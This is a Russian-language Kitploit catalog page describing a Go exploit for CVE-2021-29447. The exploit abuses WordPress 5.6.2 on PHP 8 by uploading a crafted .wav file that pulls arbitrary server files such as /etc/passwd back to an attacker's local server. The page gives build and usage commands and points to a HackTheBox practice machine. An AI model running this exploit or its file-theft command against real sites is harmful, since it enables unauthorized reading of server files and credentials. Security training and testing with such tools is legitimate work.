Skip to content
KitploitKITPLOIT
ИнструментыБлог
Отправить
ИнструментыБлог
Отправить

Инструменты для хакинга, пентеста и кибербезопасности — ваш арсенал защиты!

Kitploit — это каталог инструментов для хакинга, кибербезопасности и пентестинга. Находите последние обновления проектов для поиска уязвимостей, анализа систем, автоматизации тестирования и усиления вашей безопасности.

··Ленты·Контакты·Конфиденциальность·© 2026 Kitploit

Каталог инструментов

Категории

Все категории
Loading categories
exploit_cve-2021-29447 — Exploit на Go для CVE-2021-29447, нацеленный на WordPress 5.6.2 с PHP 8. Генерирует вредоносный .wav payload для извлечения произвольных файлов с сервера через загрузку медиа, требует базового доступа к wp-admin. | Kitploit
Инструменты/GitHubGitHub/mega8bit/exploit_cve-2021-29447
Анализ уязвимостейЭксплуатацияЭксплуатация веб-приложенийТестирование на ПроникновениеОбучение и Образование
GitHubmega8bit/exploit_cve-2021-29447

exploit_cve-2021-29447

Exploit на Go для CVE-2021-29447, нацеленный на WordPress 5.6.2 с PHP 8. Генерирует вредоносный .wav payload для извлечения произвольных файлов с сервера через загрузку медиа, требует базового доступа к wp-admin.

Репозиторий
713 лет назадЕщё не проверено

Популярное

Смотреть все →

Откройте для себя самые используемые инструменты нашего сообщества.

Изучить все инструменты

Просмотрите нашу коллекцию инструментов

Смотреть все инструменты →
Поделиться

exploit_cve-2021-29447

Только в образовательных целях.

Этот эксплойт представляет собой очень удобный инструмент для получения любого файла с сервера, работающего на WordPress 5.6.2 и php8. (см. https://wpscan.com/vulnerability/cbbe6c17-b24e-4be4-8937-c78472a138b5)

Всё, что нужно, — это базовый доступ к wp-admin и возможность загрузить медиафайл.

Эксплойт сгенерирует полезную нагрузку в виде .wav файла для загрузки через wp-admin.

Затем он использует бэк-сервер эксплойта, чтобы сразу выдать вам нужный файл прямо в консоль.

Идеальное применение — машина HackTheBox metatwo https://www.hackthebox.com/machines/metatwo

til

Использование/Примеры

root@kitploit:~
$ go build

$ chmod +x exploit_cve-2021-29447

$ ./exploit_cve-2021-29447 --help                                               
Usage of ./exploit_cve-2021-29447:
  -local-server-ip string
        Use local server ip where a local server will be set
  -local-server-port int
        Use local server port to run local server on
  -o string
        Output file to save exploit's result
  -target-path string
        Use target path to point on file you want to get from target server

$ ./exploit_cve-2021-29447 -local-server-ip=<your ip address> -target-path=/etc/passwd

Скачать инструмент